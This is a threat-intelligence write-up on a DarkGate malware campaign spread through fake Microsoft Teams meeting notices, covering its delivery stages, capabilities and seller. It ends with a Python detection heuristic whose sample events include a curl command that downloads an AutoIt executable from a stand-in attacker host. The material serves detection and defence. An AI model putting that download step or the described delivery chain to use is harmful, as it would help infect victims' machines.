A recent phishing campaign has been discovered exploiting Microsoft Teams to distribute the DarkGate malware. As reported by TrueSec, the attackers are using fake meeting notifications to lure users into downloading a malicious document. Once the document is opened, it triggers the download of the DarkGate malware.

Telekom Security CTI's analysis reveals that the malware campaign was initially misattributed to Emotet due to a false positive match. However, further examination confirmed its association with the DarkGate malware family. The malware uses AutoIt scripts for its initial infection routine and communicates with a C2 protocol similar to previous versions of DarkGate.

Victims receive a phishing message containing a link. Clicking on this link, which likely points to a traffic distribution system (TDS), leads the victim to the final payload URL for an MSI download. Opening the downloaded MSI file initiates the DarkGate infection. In another observed campaign, the initial payload was delivered as a Visual Basic script. This script, after several obfuscation layers, uses the curl binary in Windows to download the AutoIt executable and script file from an attacker-controlled server.

The malware is equipped with various features, including persistence mechanisms, privilege escalation, defense evasion techniques, and credential access. It can detect and evade common sandbox and virtual machine (VM) solutions, check for well-known antivirus products, and even masquerade its presence by injecting itself into legitimate Windows processes. Additionally, it can steal data from various programs, ranging from web browsers to software like Discord and FileZilla.

The Actor Behind DarkGate

A user named RastaFarEye has been promoting DarkGate Loader on cybercrime forums since June 16, 2023. This individual claims to have invested over 20,000 hours since 2017 in the malware's development. The actor offers various pricing models for the malware and limits its access to a maximum of 10 affiliates to maintain its exclusivity.
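The two delivery stages described above (an obfuscated Visual Basic script invoking Windows' curl binary, then an AutoIt interpreter running a downloaded script) leave a recognisable trace in process-creation telemetry. The following detection heuristic is an added example, not code from the original post or from the cited reports; it assumes Sysmon-style fields (parent image, image, command line), assumes the AutoIt interpreter is still named AutoIt3.exe, and runs over constructed sample events rather than real indicators.

```python
"""Flag DarkGate-style delivery stages in constructed process-creation events.

Rule 1: a Windows Script Host process (wscript.exe / cscript.exe) spawning
        curl.exe with an http(s) URL on its command line.
Rule 2: the AutoIt interpreter (assumed name AutoIt3.exe) executing a .au3
        script from a user-writable directory.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import urlparse

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\users\\public\\", "\\programdata\\")


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # full path of the parent process (assumed field)
    image: str          # full path of the created process (assumed field)
    command_line: str   # full command line of the created process


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _has_url(cmd: str) -> bool:
    return any(urlparse(t.strip('"')).scheme in ("http", "https") for t in cmd.split())


def classify(ev: ProcEvent) -> Optional[str]:
    """Return a finding label for a suspicious event, or None for a benign one."""
    parent, child, cmd = _basename(ev.parent_image), _basename(ev.image), ev.command_line.lower()
    if parent in SCRIPT_HOSTS and child == "curl.exe" and _has_url(cmd):
        return "vbs-curl-download"
    if child == "autoit3.exe" and ".au3" in cmd and any(d in cmd for d in USER_WRITABLE):
        return "autoit-script-from-user-dir"
    return None


def scan(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    return [(i, lbl) for i, ev in enumerate(events) if (lbl := classify(ev))]


# Constructed sample telemetry (hosts use .invalid, not real IoCs): a benign
# admin curl, the VBS->curl stage, the AutoIt stage, and a benign developer run.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\curl.exe",
              "curl.exe -s https://example.invalid/status"),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\curl.exe",
              "curl.exe -o C:\\Users\\Public\\Autoit3.exe http://attacker.invalid/Autoit3.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Users\Public\Autoit3.exe",
              "C:\\Users\\Public\\Autoit3.exe C:\\Users\\Public\\script.au3"),
    ProcEvent(r"C:\Program Files\AutoIt3\SciTE\SciTE.exe", r"C:\Program Files\AutoIt3\AutoIt3.exe",
              '"C:\\Program Files\\AutoIt3\\AutoIt3.exe" C:\\dev\\tool.au3'),
]
```

Running `scan(SAMPLE_EVENTS)` flags only the second and third events; the admin curl and the developer's AutoIt run from Program Files pass.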